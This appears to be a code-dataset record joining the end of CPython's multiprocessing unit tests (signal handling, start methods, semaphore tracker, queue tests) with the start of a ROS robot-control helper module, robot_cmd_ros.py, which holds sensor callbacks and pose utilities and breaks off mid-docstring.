        conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_ignore(self):
        conn, child_conn = multiprocessing.Pipe()
        try:
            p = multiprocessing.Process(target=self._test_ignore,
                                        args=(child_conn,))
            p.daemon = True
            p.start()
            child_conn.close()
            self.assertEqual(conn.recv(), 'ready')
            time.sleep(0.1)
            # Interrupt the child while it blocks in recv().
            os.kill(p.pid, signal.SIGUSR1)
            time.sleep(0.1)
            conn.send(1234)
            self.assertEqual(conn.recv(), 1234)
            time.sleep(0.1)
            # Interrupt the child while it blocks in a large send.
            os.kill(p.pid, signal.SIGUSR1)
            self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
            time.sleep(0.1)
            p.join()
        finally:
            conn.close()

    @classmethod
    def _test_ignore_listener(cls, conn):
        def handler(signum, frame):
            pass
        signal.signal(signal.SIGUSR1, handler)
        with multiprocessing.connection.Listener() as l:
            conn.send(l.address)
            a = l.accept()
            a.send('welcome')

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_ignore_listener(self):
        conn, child_conn = multiprocessing.Pipe()
        try:
            p = multiprocessing.Process(target=self._test_ignore_listener,
                                        args=(child_conn,))
            p.daemon = True
            p.start()
            child_conn.close()
            address = conn.recv()
            time.sleep(0.1)
            # Interrupt the child while it blocks in accept().
            os.kill(p.pid, signal.SIGUSR1)
            time.sleep(0.1)
            client = multiprocessing.connection.Client(address)
            self.assertEqual(client.recv(), 'welcome')
            p.join()
        finally:
            conn.close()
class TestStartMethod(unittest.TestCase):
    """Sanity checks for get/set_start_method() and get_context()."""

    @classmethod
    def _check_context(cls, conn):
        conn.send(multiprocessing.get_start_method())

    def check_context(self, ctx):
        # A child created from a context must report that context's method.
        r, w = ctx.Pipe(duplex=False)
        p = ctx.Process(target=self._check_context, args=(w,))
        p.start()
        w.close()
        child_method = r.recv()
        r.close()
        p.join()
        self.assertEqual(child_method, ctx.get_start_method())

    def test_context(self):
        for method in ('fork', 'spawn', 'forkserver'):
            try:
                ctx = multiprocessing.get_context(method)
            except ValueError:
                continue
            self.assertEqual(ctx.get_start_method(), method)
            self.assertIs(ctx.get_context(), ctx)
            # A concrete context's start method is fixed.
            self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
            self.assertRaises(ValueError, ctx.set_start_method, None)
            self.check_context(ctx)

    def test_set_get(self):
        multiprocessing.set_forkserver_preload(PRELOAD)
        count = 0
        old_method = multiprocessing.get_start_method()
        try:
            for method in ('fork', 'spawn', 'forkserver'):
                try:
                    multiprocessing.set_start_method(method, force=True)
                except ValueError:
                    continue
                self.assertEqual(multiprocessing.get_start_method(), method)
                ctx = multiprocessing.get_context()
                self.assertEqual(ctx.get_start_method(), method)
                self.assertTrue(type(ctx).__name__.lower().startswith(method))
                self.assertTrue(
                    ctx.Process.__name__.lower().startswith(method))
                self.check_context(multiprocessing)
                count += 1
        finally:
            multiprocessing.set_start_method(old_method, force=True)
        # At least one method must be supported on every platform.
        self.assertGreaterEqual(count, 1)

    def test_get_all(self):
        methods = multiprocessing.get_all_start_methods()
        if sys.platform == 'win32':
            self.assertEqual(methods, ['spawn'])
        else:
            self.assertTrue(methods == ['fork', 'spawn'] or
                            methods == ['fork', 'spawn', 'forkserver'])

    def test_preload_resources(self):
        if multiprocessing.get_start_method() != 'forkserver':
            self.skipTest("test only relevant for 'forkserver' method")
        name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
        rc, out, err = test.support.script_helper.assert_python_ok(name)
        out = out.decode()
        err = err.decode()
        if out.rstrip() != 'ok' or err != '':
            print(out)
            print(err)
            self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
                 "test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
    """Tests for the semaphore_tracker helper process."""

    def test_semaphore_tracker(self):
        #
        # Check that killing process does not leak named semaphores
        #
        import subprocess
        cmd = '''if 1:
            import multiprocessing as mp, time, os
            mp.set_start_method("spawn")
            lock1 = mp.Lock()
            lock2 = mp.Lock()
            os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
            os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
            time.sleep(10)
        '''
        r, w = os.pipe()
        p = subprocess.Popen([sys.executable,
                              '-E', '-c', cmd % (w, w)],
                             pass_fds=[w],
                             stderr=subprocess.PIPE)
        os.close(w)
        with open(r, 'rb', closefd=True) as f:
            name1 = f.readline().rstrip().decode('ascii')
            name2 = f.readline().rstrip().decode('ascii')
        # Unlink one semaphore ourselves; the tracker must clean up the
        # other one after the child is killed.
        _multiprocessing.sem_unlink(name1)
        p.terminate()
        p.wait()
        time.sleep(2.0)
        with self.assertRaises(OSError) as ctx:
            _multiprocessing.sem_unlink(name2)
        # docs say it should be ENOENT, but OSX seems to give EINVAL
        self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
        err = p.stderr.read().decode('utf-8')
        p.stderr.close()
        expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
        self.assertRegex(err, expected)
        self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)

    def check_semaphore_tracker_death(self, signum, should_die):
        # bpo-31310: if the semaphore tracker process has died, it should
        # be restarted implicitly.
        from multiprocessing.semaphore_tracker import _semaphore_tracker
        _semaphore_tracker.ensure_running()
        pid = _semaphore_tracker._pid
        os.kill(pid, signum)
        time.sleep(1.0)  # give it time to die
        ctx = multiprocessing.get_context("spawn")
        with contextlib.ExitStack() as stack:
            if should_die:
                stack.enter_context(self.assertWarnsRegex(
                    UserWarning,
                    "semaphore_tracker: process died"))
            sem = ctx.Semaphore()
            sem.acquire()
            sem.release()
            wr = weakref.ref(sem)
            # ensure `sem` gets collected, which triggers communication with
            # the semaphore tracker
            del sem
            gc.collect()
            self.assertIsNone(wr())

    def test_semaphore_tracker_sigint(self):
        # Catchable signal (ignored by semaphore tracker)
        self.check_semaphore_tracker_death(signal.SIGINT, False)

    def test_semaphore_tracker_sigkill(self):
        # Uncatchable signal.
        self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
    """SimpleQueue.empty() must also work from a child process."""

    @classmethod
    def _test_empty(cls, queue, child_can_start, parent_can_continue):
        child_can_start.wait()
        # issue 30301, could fail under spawn and forkserver
        try:
            queue.put(queue.empty())
            queue.put(queue.empty())
        finally:
            parent_can_continue.set()

    def test_empty(self):
        queue = multiprocessing.SimpleQueue()
        child_can_start = multiprocessing.Event()
        parent_can_continue = multiprocessing.Event()
        proc = multiprocessing.Process(
            target=self._test_empty,
            args=(queue, child_can_start, parent_can_continue)
        )
        proc.daemon = True
        proc.start()
        self.assertTrue(queue.empty())
        child_can_start.set()
        parent_can_continue.wait()
        self.assertFalse(queue.empty())
        # First put saw an empty queue (True); second saw one item (False).
        self.assertEqual(queue.get(), True)
        self.assertEqual(queue.get(), False)
        self.assertTrue(queue.empty())
        proc.join()
#
# Mixins
#
class BaseMixin(object):
    """Records dangling processes/threads at class setup and warns about
    any new ones left behind at teardown."""

    @classmethod
    def setUpClass(cls):
        cls.dangling = (multiprocessing.process._dangling.copy(),
                        threading._dangling.copy())

    @classmethod
    def tearDownClass(cls):
        # bpo-26762: Some multiprocessing objects like Pool create reference
        # cycles. Trigger a garbage collection to break these cycles.
        test.support.gc_collect()

        processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
        if processes:
            test.support.environment_altered = True
            print('Warning -- Dangling processes: %s' % processes,
                  file=sys.stderr)
        processes = None

        threads = set(threading._dangling) - set(cls.dangling[1])
        if threads:
            test.support.environment_altered = True
            print('Warning -- Dangling threads: %s' % threads,
                  file=sys.stderr)
        threads = None
class ProcessesMixin(BaseMixin):
    """Run the generic test cases against real processes."""
    TYPE = 'processes'
    Process = multiprocessing.Process
    connection = multiprocessing.connection
    current_process = staticmethod(multiprocessing.current_process)
    active_children = staticmethod(multiprocessing.active_children)
    Pool = staticmethod(multiprocessing.Pool)
    Pipe = staticmethod(multiprocessing.Pipe)
    Queue = staticmethod(multiprocessing.Queue)
    JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
    Lock = staticmethod(multiprocessing.Lock)
    RLock = staticmethod(multiprocessing.RLock)
    Semaphore = staticmethod(multiprocessing.Semaphore)
    BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
    Condition = staticmethod(multiprocessing.Condition)
    Event = staticmethod(multiprocessing.Event)
    Barrier = staticmethod(multiprocessing.Barrier)
    Value = staticmethod(multiprocessing.Value)
    Array = staticmethod(multiprocessing.Array)
    RawValue = staticmethod(multiprocessing.RawValue)
    RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
    """Run the generic test cases against objects proxied by a Manager."""
    TYPE = 'manager'
    Process = multiprocessing.Process
    # Properties defer to the shared manager created in setUpClass().
    Queue = property(operator.attrgetter('manager.Queue'))
    JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
    Lock = property(operator.attrgetter('manager.Lock'))
    RLock = property(operator.attrgetter('manager.RLock'))
    Semaphore = property(operator.attrgetter('manager.Semaphore'))
    BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
    Condition = property(operator.attrgetter('manager.Condition'))
    Event = property(operator.attrgetter('manager.Event'))
    Barrier = property(operator.attrgetter('manager.Barrier'))
    Value = property(operator.attrgetter('manager.Value'))
    Array = property(operator.attrgetter('manager.Array'))
    list = property(operator.attrgetter('manager.list'))
    dict = property(operator.attrgetter('manager.dict'))
    Namespace = property(operator.attrgetter('manager.Namespace'))

    @classmethod
    def Pool(cls, *args, **kwds):
        return cls.manager.Pool(*args, **kwds)

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.manager = multiprocessing.Manager()

    @classmethod
    def tearDownClass(cls):
        # only the manager process should be returned by active_children()
        # but this can take a bit on slow machines, so wait a few seconds
        # if there are other children too (see #17395)
        start_time = time.monotonic()
        t = 0.01
        while len(multiprocessing.active_children()) > 1:
            time.sleep(t)
            t *= 2
            dt = time.monotonic() - start_time
            if dt >= 5.0:
                test.support.environment_altered = True
                print("Warning -- multiprocessing.Manager still has %s active "
                      "children after %s seconds"
                      % (multiprocessing.active_children(), dt),
                      file=sys.stderr)
                break

        gc.collect()  # do garbage collection
        if cls.manager._number_of_objects() != 0:
            # This is not really an error since some tests do not
            # ensure that all processes which hold a reference to a
            # managed object have been joined.
            test.support.environment_altered = True
            print('Warning -- Shared objects which still exist at manager '
                  'shutdown:')
            print(cls.manager._debug_info())
        cls.manager.shutdown()
        cls.manager.join()
        cls.manager = None

        super().tearDownClass()
class ThreadsMixin(BaseMixin):
    """Run the generic test cases against the thread-based dummy API."""
    TYPE = 'threads'
    Process = multiprocessing.dummy.Process
    connection = multiprocessing.dummy.connection
    current_process = staticmethod(multiprocessing.dummy.current_process)
    active_children = staticmethod(multiprocessing.dummy.active_children)
    Pool = staticmethod(multiprocessing.dummy.Pool)
    Pipe = staticmethod(multiprocessing.dummy.Pipe)
    Queue = staticmethod(multiprocessing.dummy.Queue)
    JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
    Lock = staticmethod(multiprocessing.dummy.Lock)
    RLock = staticmethod(multiprocessing.dummy.RLock)
    Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
    BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
    Condition = staticmethod(multiprocessing.dummy.Condition)
    Event = staticmethod(multiprocessing.dummy.Event)
    Barrier = staticmethod(multiprocessing.dummy.Barrier)
    Value = staticmethod(multiprocessing.dummy.Value)
    Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
    """Clone this module's test cases into `remote_globs` (the namespace of
    a per-start-method wrapper module), specialized for `start_method`, and
    install matching setUpModule/tearDownModule hooks there."""
    __module__ = remote_globs['__name__']
    local_globs = globals()
    ALL_TYPES = {'processes', 'threads', 'manager'}

    for name, base in local_globs.items():
        if not isinstance(base, type):
            continue
        if issubclass(base, BaseTestCase):
            if base is BaseTestCase:
                continue
            assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
            for type_ in base.ALLOWED_TYPES:
                # e.g. _TestFoo + ProcessesMixin -> WithProcessesTestFoo
                newname = 'With' + type_.capitalize() + name[1:]
                Mixin = local_globs[type_.capitalize() + 'Mixin']
                class Temp(base, Mixin, unittest.TestCase):
                    pass
                Temp.__name__ = Temp.__qualname__ = newname
                Temp.__module__ = __module__
                remote_globs[newname] = Temp
        elif issubclass(base, unittest.TestCase):
            # Plain TestCases are re-exported unchanged (fresh subclass so
            # the wrapper module owns them).
            class Temp(base, object):
                pass
            Temp.__name__ = Temp.__qualname__ = name
            Temp.__module__ = __module__
            remote_globs[name] = Temp

    dangling = [None, None]
    old_start_method = [None]

    def setUpModule():
        multiprocessing.set_forkserver_preload(PRELOAD)
        multiprocessing.process._cleanup()
        dangling[0] = multiprocessing.process._dangling.copy()
        dangling[1] = threading._dangling.copy()
        old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
        try:
            multiprocessing.set_start_method(start_method, force=True)
        except ValueError:
            raise unittest.SkipTest(start_method +
                                    ' start method not supported')

        if sys.platform.startswith("linux"):
            try:
                lock = multiprocessing.RLock()
            except OSError:
                raise unittest.SkipTest("OSError raises on RLock creation, "
                                        "see issue 3111!")
        check_enough_semaphores()
        util.get_temp_dir()  # creates temp directory
        multiprocessing.get_logger().setLevel(LOG_LEVEL)

    def tearDownModule():
        need_sleep = False

        # bpo-26762: Some multiprocessing objects like Pool create reference
        # cycles. Trigger a garbage collection to break these cycles.
        test.support.gc_collect()

        multiprocessing.set_start_method(old_start_method[0], force=True)
        # pause a bit so we don't get warning about dangling threads/processes
        processes = set(multiprocessing.process._dangling) - set(dangling[0])
        if processes:
            need_sleep = True
            test.support.environment_altered = True
            print('Warning -- Dangling processes: %s' % processes,
                  file=sys.stderr)
        processes = None

        threads = set(threading._dangling) - set(dangling[1])
        if threads:
            need_sleep = True
            test.support.environment_altered = True
            print('Warning -- Dangling threads: %s' % threads,
                  file=sys.stderr)
        threads = None

        # Sleep 500 ms to give time to child processes to complete.
        if need_sleep:
            time.sleep(0.5)

        multiprocessing.process._cleanup()
        test.support.gc_collect()

    remote_globs['setUpModule'] = setUpModule
    remote_globs['tearDownModule'] = tearDownModule
|
robot_cmd_ros.py | #!/usr/bin/env python
import time
import os
import socket
import math
import sys
from threading import Thread
from datetime import datetime
import rospy
import tf
import actionlib
import cv2
from std_msgs.msg import String
from geometry_msgs.msg import Twist, Quaternion, Pose, PoseWithCovarianceStamped
from sensor_msgs.msg import LaserScan, Range, Image, Joy
from control_msgs.msg import JointJog
from nav_msgs.msg import Odometry
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from cv_bridge import CvBridge, CvBridgeError
# Android phone sensors read with 'ROS Sensors Driver' App
from sensor_msgs.msg import Imu, NavSatFix, Illuminance, MagneticField
# Optional dependency: person-following action (rococo_navigation).
try:
    from rococo_navigation.msg import FollowPersonAction, FollowPersonGoal
    rococo_navigation_Found = True
except:
    print("rococo_navigation not found")
    rococo_navigation_Found = False

# Optional dependency: AprilTag fiducial detection messages.
try:
    from apriltags_ros.msg import AprilTagDetectionArray
    AprilTagFound = True
except:
    print("apriltag_ros not found")
    AprilTagFound = False
# Audio server connection settings (see audio_connect_thread()).
AUDIO_SERVER_IP = '127.0.0.1'
AUDIO_SERVER_PORT = 9001
assock = None                # socket connected to the audio server
use_robot = True             # enable motion pubs/subs in begin()
use_audio = True             # enable audio server connection in begin()
robot_initialized = False    # set once begin() completed the ROS setup
stop_request = False         # set by robot_stop_request(), cleared by begin()
logdir = os.getenv('HOME')+'/log/' # dir for writing log files (programs, images,... )
# Topic names
TOPIC_tag_detections = 'tag_detections'
TOPIC_scan = 'scan'
TOPIC_amcl_pose = 'amcl_pose'
TOPIC_cmd_vel = 'cmd_vel'
TOPIC_desired_cmd_vel = 'desired_cmd_vel'
TOPIC_odom = 'odom'
TOPIC_joints = 'cmd_joints_jog'
TOPIC_joy = 'joy'
ACTION_move_base = 'move_base'
TOPIC_sonar_0 = '/sonar_0'
TOPIC_sonar_1 = '/sonar_1'
TOPIC_sonar_2 = '/sonar_2'
TOPIC_sonar_3 = '/sonar_3'
TOPIC_GROUND_TRUTH = '/base_pose_ground_truth'
TOPIC_SETPOSE = '/setpose'
TOPIC_STAGESAY = '/stage_say'
# Android sensors ('ROS Sensors Driver' app): latest message + subscriber
TOPIC_IMU = '/android/imu'
IMU_ = None
IMU_sub = None
TOPIC_FIX = '/android/fix'
FIX_ = None
FIX_sub = None
TOPIC_MAG = '/android/magnetic_field'
MAG_ = None
MAG_sub = None
TOPIC_ILL = '/android/illuminance'
ILL_ = None
ILL_sub = None
# ROS callbacks: cache the latest Android sensor message of each kind.
def IMU_cb(data):
    global IMU_
    IMU_ = data

def FIX_cb(data):
    global FIX_
    FIX_ = data

def MAG_cb(data):
    global MAG_
    MAG_ = data

def ILL_cb(data):
    global ILL_
    ILL_ = data
# functions available for the programmer
def accel_gyro():
    """Latest phone Imu message (None if never received)."""
    global IMU_
    return IMU_

def sat_nav():
    """Latest phone NavSatFix message (None if never received)."""
    global FIX_
    return FIX_

def magnetometer():
    """Latest phone MagneticField message (None if never received)."""
    global MAG_
    return MAG_

def illuminance():
    """Latest phone Illuminance message (None if never received)."""
    global ILL_
    return ILL_
# gbn navigation present
use_desired_cmd_vel=False
# Good values
tv_good = 0.2      # cruise translational speed [m/s]
rv_good = 0.8      # cruise rotational speed [rad/s]
tv_min = 0.1       # minimum effective translational speed
rv_min = 0.1       # minimum effective rotational speed
move_step = 1.0    # default length of a single move [m]
# robot pose from odometry
odom_robot_pose = None
# robot pose from localization
map_robot_pose = None
# robot pose from ground truth simulation
gt_robot_pose = None
# move_base target pose
target_pose = None
# robot velocity vector [linear.x, angular.z]
odom_robot_vel = None
move_base_running = False
ac_movebase = None
def setMoveStep(x):
    """Set the default distance (m) of a single forward/backward move."""
    global move_step
    move_step=x
def setMaxSpeed(x,r):
    """Set cruise translational (m/s) and rotational (rad/s) speeds."""
    global tv_good, rv_good
    tv_good=x
    rv_good=r
def setRobotNamePrefix(prefix):
    """Prepend `prefix` to all robot topic/action names (multi-robot setups).

    Must be called before begin(), which creates the publishers/subscribers.

    Bug fix: TOPIC_GROUND_TRUTH, TOPIC_SETPOSE and TOPIC_STAGESAY were
    re-assigned without being listed in the `global` statement, so those
    assignments only created function locals and the module-level names
    were silently left unchanged.
    """
    global TOPIC_tag_detections,TOPIC_scan,TOPIC_amcl_pose,TOPIC_cmd_vel,TOPIC_desired_cmd_vel, \
           TOPIC_odom,TOPIC_joy,TOPIC_joints,ACTION_move_base, \
           TOPIC_sonar_0,TOPIC_sonar_1,TOPIC_sonar_2,TOPIC_sonar_3, \
           TOPIC_GROUND_TRUTH,TOPIC_SETPOSE,TOPIC_STAGESAY
    TOPIC_tag_detections = prefix+'/' + TOPIC_tag_detections
    TOPIC_scan = prefix+'/'+TOPIC_scan
    TOPIC_amcl_pose = prefix+'/'+TOPIC_amcl_pose
    TOPIC_cmd_vel = prefix+'/'+TOPIC_cmd_vel
    TOPIC_desired_cmd_vel = prefix+'/'+TOPIC_desired_cmd_vel
    TOPIC_odom = prefix+'/'+TOPIC_odom
    TOPIC_joints = prefix + '/' + TOPIC_joints
    TOPIC_joy = prefix + '/' + TOPIC_joy
    ACTION_move_base = prefix+'/'+ACTION_move_base
    TOPIC_sonar_0 = prefix+'/'+TOPIC_sonar_0
    TOPIC_sonar_1 = prefix+'/'+TOPIC_sonar_1
    TOPIC_sonar_2 = prefix+'/'+TOPIC_sonar_2
    TOPIC_sonar_3 = prefix+'/'+TOPIC_sonar_3
    TOPIC_GROUND_TRUTH = prefix+'/'+TOPIC_GROUND_TRUTH
    TOPIC_SETPOSE = prefix+'/'+TOPIC_SETPOSE
    TOPIC_STAGESAY = prefix+'/'+TOPIC_STAGESAY
def setAudioConnection(ip, port=9001):
    """Set the address of the external audio (speech/sound) server."""
    global AUDIO_SERVER_IP, AUDIO_SERVER_PORT
    AUDIO_SERVER_IP = ip
    AUDIO_SERVER_PORT = port
# ROS parameter controlling the gradient-based-navigation node.
PARAM_gbnEnabled = '/gradientBasedNavigation/gbnEnabled'

def enableObstacleAvoidance(value=True):
    """Toggle obstacle avoidance; when enabled, velocity commands are sent
    to desired_cmd_vel so the gbn node can filter them."""
    global use_desired_cmd_vel
    rospy.set_param(PARAM_gbnEnabled, value)
    use_desired_cmd_vel = value
def robot_stop_request(): # stop until next begin()
    """Request a robot stop; the flag stays set until the next begin()."""
    global stop_request
    stop_request = True
    if (use_robot):
        stop()  # NOTE(review): stop() is presumably defined later in this file — confirm
    print("stop request")
# Condition Variables and Functions
tag_trigger_ = False   # True while a tag is (recently) detected
tag_id_ = -1           # id of the last detected tag
tag_distance_ = 0      # distance (m) of the last detected tag
tag_angle_ = 0         # bearing (deg) of the last detected tag
tag_count = 25         # countdown of empty frames before the trigger resets

def tagTrigger():
    global tag_trigger_
    return tag_trigger_

def tagID():
    global tag_id_
    return tag_id_

def tagDistance():
    global tag_distance_
    return tag_distance_

def tagAngle():
    global tag_angle_
    return tag_angle_

# snake_case aliases of the accessors above
def tag_trigger():
    return tagTrigger()

def tag_id():
    return tagID()

def tag_distance():
    return tagDistance()

def tag_angle():
    return tagAngle()
# Minimum obstacle distances (m) per direction, updated by the laser and
# sonar callbacks; 10 is the "nothing seen" initial value.
laser_center_dist = 10
laser_left_dist = 10
laser_right_dist = 10
laser_back_dist = 10

def laser_center_distance():
    """Closest obstacle distance (m) straight ahead."""
    global laser_center_dist
    return laser_center_dist
def getRobotPose(frame=None):
    """CamelCase alias of get_robot_pose()."""
    return get_robot_pose(frame)
def get_robot_pose(frame=None): # returns [x,y,theta]
    """Return a copy of the current robot pose [x, y, theta].

    frame: None (auto: localization if available, else odometry),
    'odom', 'map', or anything else for simulation ground truth ('gt').
    """
    global odom_robot_pose, map_robot_pose, gt_robot_pose
    if frame is None:
        # auto detect: prefer the localized pose, fall back to odometry
        pose = map_robot_pose if map_robot_pose is not None else odom_robot_pose
    elif frame == 'odom':
        pose = odom_robot_pose
    elif frame == 'map':
        pose = map_robot_pose
    else:  # frame=='gt'
        pose = gt_robot_pose
    return list(pose)
def getRobotVel():
    """CamelCase alias of get_robot_vel()."""
    return get_robot_vel()

def get_robot_vel():
    """Current robot velocity [linear.x, angular.z] from odometry."""
    global odom_robot_vel
    return list(odom_robot_vel)
def obstacleDistance(direction=0):
    """CamelCase alias of obstacle_distance().

    Bug fix: this wrapper previously called obstacle_distance(direction=0),
    discarding its own `direction` argument, so queries for left/right/back
    always returned the frontal distance.
    """
    return obstacle_distance(direction)
def obstacle_distance(direction=0):
    """Closest obstacle distance (m) toward `direction` degrees:
    0 = front, 90 = left, -90/270 = right, +/-180 = back.
    NOTE(review): any other direction falls through and returns None."""
    global laser_center_dist, laser_left_dist, laser_right_dist, laser_back_dist
    if (direction==0): #front
        return laser_center_dist
    elif (direction==90): #left
        return laser_left_dist
    elif (direction==-90 or direction==270): # right
        return laser_right_dist
    elif (abs(direction)==180): # back
        return laser_back_dist
def distance(p1, p2):
    """Euclidean distance between two 2D points given as indexables [x, y]."""
    delta_x = p1[0] - p2[0]
    delta_y = p1[1] - p2[1]
    return math.sqrt(delta_x * delta_x + delta_y * delta_y)
# ROS param access
def set_global_param(var, value):
    """Store `value` under /MARRtino/params/<var> together with the current
    ROS time in seconds (used by event() for freshness checks)."""
    param = '/MARRtino/params/'+var
    now = rospy.Time.now()
    pd = {}
    pd['value'] = value
    pd['timestamp'] = now.secs
    rospy.set_param(param, pd)
def get_global_param(var):
    """Read /MARRtino/params/<var>; return '' when the parameter is unset."""
    param = '/MARRtino/params/' + var
    if not rospy.has_param(param):
        return ''
    return rospy.get_param(param, '')
def del_global_param(var):
    """Delete /MARRtino/params/<var> if present."""
    param = '/MARRtino/params/'+var
    if rospy.has_param(param):
        rospy.delete_param(param)
def event():
    """Return (and consume) the pending global event value if it was raised
    within the last 5 seconds; '' otherwise."""
    pd = get_global_param('event')
    if (pd==''):
        return ''
    now = rospy.Time.now()
    if (now.secs - pd['timestamp'] < 5): # last 5 seconds
        del_global_param('event')
        return pd['value']
    else:
        return ''
# ROS publishers/subscribers (all created in begin())
cmd_pub = None # cmd_vel publisher
des_cmd_pub = None # desired_cmd_vel publisher
tag_sub = None # tag_detection subscriber
laser_sub = None # laser subscriber
odom_sub = None # odom subscriber
joints_pub = None # joint publisher
joy_sub = None # Joystick subscriber
localizer_sub = None # amcl_pose subscriber
sonar_sub_0 = None # sonar subscribers (front/right/back/left)
sonar_sub_1 = None
sonar_sub_2 = None
sonar_sub_3 = None
stage_setpose_pub = None # Stage setpose (needs stagerosPeople)
stage_say_pub = None # Stage say (needs stagerosPeople)
# ROS Callback functions
def tag_cb(data):
    """AprilTag detection callback: latch the first detected tag.

    Keeps tag_trigger_ True for `tag_count` consecutive empty frames after
    the tag disappears, then resets the tag state.

    Bug fix: the empty-detections branch tested `tag_trigger` — the module
    accessor *function*, which is always truthy — instead of the
    `tag_trigger_` flag, so the countdown ran even when no tag had been seen.
    """
    global tag_trigger_, tag_count, tag_id_, tag_distance_, tag_angle_
    v = data.detections
    if (len(v)>0):
        tag_id_ = v[0].id
        tag_distance_ = v[0].pose.pose.position.z
        # bearing of the tag in degrees, positive to the left
        tag_angle_ = math.atan2(-v[0].pose.pose.position.x,v[0].pose.pose.position.z)*180.0/math.pi
        tag_trigger_ = True
        tag_count = 3 # about seconds
    else:
        if (tag_trigger_):
            tag_count = tag_count - 1
            if (tag_count==0):
                tag_trigger_ = False
                tag_id_ = -1
                tag_distance_ = 0
                tag_angle_ = 0
def laser_cb(data):
    """LaserScan callback: update minimum obstacle distances for the
    front, left and right sectors (+/-10 beams around each direction).

    Bug fix: `nc` was computed with true division, which yields a float
    under Python 3 and makes the range slices below raise TypeError on
    every scan; use floor division instead (a no-op under Python 2).
    """
    global laser_center_dist, laser_left_dist, laser_right_dist, laser_back_dist
    nc = len(data.ranges)//2   # index of the front-facing beam
    # indices of the beams at -90 / +90 degrees
    nr = int((data.angle_max - math.pi/2)/data.angle_increment)
    nl = len(data.ranges) - nr
    laser_center_dist = min(data.ranges[nc-10:nc+10])
    try:
        laser_left_dist = min(data.ranges[nl-10:nl+10])
        laser_right_dist = min(data.ranges[nr-10:nr+10])
    except:
        # scan narrower than +/-90 deg: keep the previous side distances
        pass
    #laser_left_dist = -1
    #laser_right_dist = -1
    #print("angle min %.3f max %.3f inc %.6f" %(data.angle_min, data.angle_max, data.angle_increment))
    #print("center %.3f left %.3f right %.3f" %(laser_center_dist, laser_left_dist, laser_right_dist))
def sonar_cb(data):
    """Range (sonar) callback: route the reading to the proper direction
    based on the sensor frame id."""
    global laser_center_dist, laser_left_dist, laser_right_dist, laser_back_dist
    r = data.range # ??? *0.75/0.265 #scale the value of the range in meters
    if(data.header.frame_id == "/sonar_frame_0"): # front
        laser_center_dist = r
    elif(data.header.frame_id == "/sonar_frame_1"): # right
        laser_right_dist = r
    elif(data.header.frame_id == "/sonar_frame_3"): # left
        laser_left_dist = r
    elif(data.header.frame_id == "/sonar_frame_2"): # back
        laser_back_dist = r
def odom_cb(data):
    """Odometry callback: update odom_robot_pose [x, y, yaw] and
    odom_robot_vel [linear.x, angular.z]."""
    global odom_robot_pose, odom_robot_vel
    if (odom_robot_pose is None):
        odom_robot_pose = [0,0,0]
    odom_robot_pose[0] = data.pose.pose.position.x
    odom_robot_pose[1] = data.pose.pose.position.y
    o = data.pose.pose.orientation
    q = (o.x, o.y, o.z, o.w)
    euler = tf.transformations.euler_from_quaternion(q)
    odom_robot_pose[2] = euler[2] # yaw
    #odomframe = data.header.frame_id
    if (odom_robot_vel is None):
        odom_robot_vel = [0,0]
    odom_robot_vel[0] = data.twist.twist.linear.x
    odom_robot_vel[1] = data.twist.twist.angular.z
def localizer_cb(data):
    """amcl_pose callback: update map_robot_pose [x, y, yaw]."""
    global map_robot_pose
    if (map_robot_pose is None):
        map_robot_pose = [0,0,0]
    map_robot_pose[0] = data.pose.pose.position.x
    map_robot_pose[1] = data.pose.pose.position.y
    o = data.pose.pose.orientation
    q = (o.x, o.y, o.z, o.w)
    euler = tf.transformations.euler_from_quaternion(q)
    map_robot_pose[2] = euler[2] # yaw
def groundtruth_cb(data):
    """Simulation ground-truth callback: update gt_robot_pose [x, y, yaw]."""
    global gt_robot_pose
    if (gt_robot_pose is None):
        gt_robot_pose = [0,0,0]
    gt_robot_pose[0] = data.pose.pose.position.x
    gt_robot_pose[1] = data.pose.pose.position.y
    o = data.pose.pose.orientation
    q = (o.x, o.y, o.z, o.w)
    euler = tf.transformations.euler_from_quaternion(q)
    gt_robot_pose[2] = euler[2] # yaw
# speed/jog from Joystick
joy_cmd_vel = [0, 0]   # [linear, angular] from the last Joy message

def joy_cb(data):
    global joy_cmd_vel
    joy_cmd_vel = [data.axes[1], data.axes[2]]

def getJoyVel():
    """Latest joystick command [linear, angular]."""
    return joy_cmd_vel
cvbridge = None  # lazily created CvBridge instance
cvimage = None   # latest camera frame as an OpenCV BGR image

def image_cb(data):
    global cvbridge, cvimage
    # Convert image to OpenCV format
    try:
        if cvbridge is None:
            cvbridge = CvBridge()
        cvimage = cvbridge.imgmsg_to_cv2(data, "bgr8")
    except CvBridgeError as e:
        print(e)
# select topic of type sensor_msgs/Image
def autoImageTopic():
    """Return the first published sensor_msgs/Image topic that is not a
